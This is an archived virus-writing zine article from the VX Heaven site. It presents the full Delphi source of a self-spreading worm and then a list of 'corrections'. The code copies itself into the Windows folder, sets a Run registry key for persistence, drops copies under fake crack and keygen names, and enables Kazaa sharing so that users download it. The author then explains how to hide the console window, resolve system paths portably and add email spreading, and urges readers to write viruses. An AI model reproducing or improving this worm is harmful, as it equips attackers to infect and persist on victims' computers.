Maximize
Bookmark

VX Heaven

Library Collection Sources Engines Constructors Simulators Utilities Links Forum

Simple worm in delphi and corrections

Hutley
Ready Rangers Liberation Front [7]
July 2006

[Back to index] [Comments]

Introduction

Here I will go to explain to you the code of my first worm. Totaly written in Delphi. It was my first creation of type worm, because since then I had made only one Trojan and a creator of backdoors for mirc. As I wise person very as well as would not have to be one worm, I was programming it in accordance with some things that I already had made with the Legionário Trojan - my first creation for world vx. After programmed and distributed, I decided to publish the code to have the opinion of other people who were more the time in the branch of that I.

At that time, I was in another group (GEDZAC), then I asked for aid to the other members so that they evaluated my code and they pointed me the errors.

The result was excellent. Those mans (MachineDramon, Falckon, Sr.Muerte, Pana_Infierno, DemionKlaz, and others), they had had spectacular a good will in saying me where i committed errors and which the certain method of if making so that mine worm did not lose its effectiveness.

The source code

program porn;

{$APPTYPE CONSOLE}

{       I-Worm.Hutley.Cris
        Brasil! Rulez! }


// Please KAV Lab. this is I-Worm.Hutley.Cris
// it's the original name! Understand?
uses
        Windows, SysUtils, Registry;

procedure ExecutaViaRegistro(nome, path: string);
var evrg: TRegistry;
begin
        evrg := TRegistry.Create;
        evrg.RootKey := HKEY_LOCAL_MACHINE;
        evrg.OpenKey('SOFTWARE\Microsoft\Windows\CurrentVersion\Run', FALSE);
        evrg.WriteString(nome, path);
        evrg.Destroy;
end;

procedure Kazaa;
var reg: Tregistry;
        Cris: array[0..260] of Char;
begin
        reg := TRegistry.Create;
        reg.RootKey := HKEY_CURRENT_USER;
        reg.OpenKey('Software\Kazaa\LocalContent', True);
        reg.WriteString('DisableSharing', '0');
        reg.writestring('dir0', '012345:' + 'C:\Windows\files');
        reg.writestring('dir1', '012345:' + 'C:\Windows\files');
        reg.writestring('dir2', '012345:' + 'C:\Windows\files');
        reg.writestring('dir3', '012345:' + 'C:\Windows\files');
        reg.writestring('dir4', '012345:' + 'C:\Windows\files');
        reg.writestring('dir5', '012345:' + 'C:\Windows\files');
        CreateDirectory('C:\windows\files', nil);
        GetModuleFileNameA(0, Cris, SizeOf(Cris));
        CopyFile(Cris, 'C:\Windows\files\hotmail_hacker.exe', True);
        CopyFile(Cris, 'C:\Windows\files\hotmail_cracker.exe', True);
        CopyFile(Cris, 'C:\Windows\files\hotmail_account_sniffer.exe', True);
        CopyFile(Cris, 'C:\Windows\files\aim_hack.exe', True);
        CopyFile(Cris, 'C:\Windows\files\msn_crack.exe', True);
        CopyFile(Cris, 'C:\Windows\files\icq_hack.exe', True);
        CopyFile(Cris, 'C:\Windows\files\WarDialer.exe', True);
        CopyFile(Cris, 'C:\Windows\files\Delphi 6 - Serial Gen.exe', True);
        CopyFile(Cris, 'C:\Windows\files\WinxpHack.exe', True);
        CopyFile(Cris, 'C:\Windows\files\Delphi 7 Crack.exe', True);
        CopyFile(Cris, 'C:\Windows\files\win2k_serial_gen.exe', True);
        CopyFile(Cris, 'C:\Windows\files\yahoo_hack.exe', True);
        CopyFile(Cris, 'C:\Windows\files\ftp_crack.exe', True);
        CopyFile(Cris, 'C:\Windows\files\XP_keygen.exe', True);
        CopyFile(Cris, 'C:\Windows\files\PS2_emulator_bleem.exe', True);
        CopyFile(Cris, 'C:\Windows\files\win2k_pass_decryptor.exe', True);
        CopyFile(Cris, 'C:\Windows\files\Win2k_reboot_exploit.exe', True);
        CopyFile(Cris, 'C:\Windows\files\IIS_ShellBind.exe', True);
        CopyFile(Cris, 'C:\Windows\files\WinZip_KeyGen.exe', True);
        CopyFile(Cris, 'C:\Windows\files\Counter Strike_CD_Keygen.exe', True);
        CopyFile(Cris, 'C:\Windows\files\Delphi 2005 Keygen.exe', True);
        CopyFile(Cris, 'C:\Windows\files\Delphi 9 Keygen.exe', True);
        CopyFile(Cris, 'C:\Windows\files\Half_life Cd keygen.exe', True);
        CopyFile(Cris, 'C:\Windows\files\Hotmail Hacker.exe', True);
        CopyFile(Cris, 'C:\Windows\files\ICQ_Hackingtools.exe', True);
        CopyFile(Cris, 'C:\Windows\files\invisible_IP.exe', True);
end;

var
        Cris: array[0..260] of Char;
 
begin
        GetModuleFileNameA(0, Cris, SizeOf(Cris));
        if not (FileExists('C:\Windows\WinExec.exe')) then
        begin
                CopyFile(Cris, 'C:\Windows\WinExec.exe', True);
                ExecutaViaRegistro('WinExec', 'C:\Windows\WinExec.exe');
        end else
                ExecutaViaRegistro('WinExec', 'C:\Windows\WinExec.exe');
        Kazaa;
end.
 

An explanation

What this worm makes is only if auto to copy for a folder created for he himself. When it is copied using several other names, it it has access to the register of the system and makes with that this folder is shared by the KAZAA. It also creates only one copy of itself in the folder of windows, and writes in the register so that all time is executed that windows will be initiated.

The correction

1 - {$APPTYPE CONSOLE}

This stretch, in Delphi, is called "directive compilation". Removing this directive one, it makes with that the window console does not appear. The correct one is to remove it

2 - CopyFile(Cris, 'C:\Windows\files\hotmail_hacker.exe', True);

This line of command possesss a good idea, but its effectiveness is engaged.

For two reasons it is engaged. First - It copies itself for a folder that will be add as shared for the KAZAA, this implies where, if the user will not have the KAZAA worm will not go to spread itself. Second - as you already must have noticed, the complete way of the archive already you are placed, this you compromise worm if the user will have windows installed for example in unit E:.

The way to kill these two problems would be, to place the auto possibility of if also propagating for email and other programs of P2P. How much to the problem of the complete way, it is necessary to add to the code a function that will go to return the folder from windows, ai is enough to add "files\hotmail_hacker.exe" and ready, this problem is decided. It sees the function that returns the folder from windows.

function WinDir: string;
begin
  SetLength(Result, MAX_PATH);
  Windows.GetWindowsDirectory(PChar(Result), MAX_PATH);
  Result := string(PChar(Result)) + '\';
end;
 

With this function in the code, that one same line of command would be thus:

CopyFile(Cris, WinDir + 'files\hotmail_hacker.exe', True);
 

The same thing if applies the commands:

reg.writestring('dir0', '012345:' + 'C:\Windows\files');
 

and too the:

ExecutaViaRegistro('WinExec', 'C:\Windows\WinExec.exe');
 

The end

These are the biggest problems of this worm basic that one day I broke the head to develop. I wait to have helped in the initiation of plus some coders for this wonderful world that is of the creation of virus/worms/trojans.

With world vx diminishing each time more, I believe to be important to make beginning basic articles for with a language of easy learning and high level as delphi is.

This is all staff.

Suggestions, critics: [email protected] - www.hutley.cjb.net

By accessing, viewing, downloading or otherwise using this content you agree to be bound by the Terms of Use! vxheaven.org aka vx.netlux.org
deenesitfrplruua